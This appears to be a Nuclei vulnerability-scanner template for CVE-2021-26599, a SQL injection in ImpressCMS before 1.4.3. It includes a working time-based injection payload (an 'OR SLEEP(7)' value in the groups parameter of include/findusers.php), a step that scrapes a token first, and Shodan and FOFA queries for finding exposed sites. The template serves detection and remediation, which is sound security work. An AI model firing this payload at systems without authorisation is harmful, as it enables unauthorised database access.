id: CVE-2021-26599

info:
  name: ImpressCMS < 1.4.3 - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    ImpressCMS before 1.4.3 is vulnerable to SQL injection via the groups parameter in include/findusers.php, allowing unauthenticated attackers to execute arbitrary SQL queries.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries via SQL injection, potentially extracting sensitive database contents or modifying data.
  remediation: |
    Update ImpressCMS to version 1.4.3 or later.
  reference:
    - https://hackerone.com/reports/1081145
    - http://karmainsecurity.com/KIS-2022-04
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26599
  classification:
    cve-id: CVE-2021-26599
    cwe-id: CWE-89
    epss-score: 0.03926
    epss-percentile: 0.88623
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: impresscms
    product: impresscms
    shodan-query: http.html:"ImpressCMS"
    fofa-query: body="ImpressCMS"
  tags: cve,cve2021,impresscms,sqli,time-based-sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /misc.php?action=showpopups&type=friend HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "REQUEST' value='(.*)'"
        internal: true

  - raw:
      - |
        @timeout: 30s
        POST /include/findusers.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_submit=1&token={{token}}&groups[]=1%20OR%20SLEEP(7)#

    matchers:
      - type: dsl
        dsl:
          - duration>=7
          - status_code==200
          - contains(body, "array(1) {")
        condition: and
# digest: 4a0a00473045022100aa867208fb49bc1ff1e437f74c922682038d0dea80e4f6dab11ae27712edaeb50220565a52b7bb0999ef23fa7d7997cce655299c2456e8287a8093c69717bbaa7a36:922c64590222798bb761d5b6d8e72950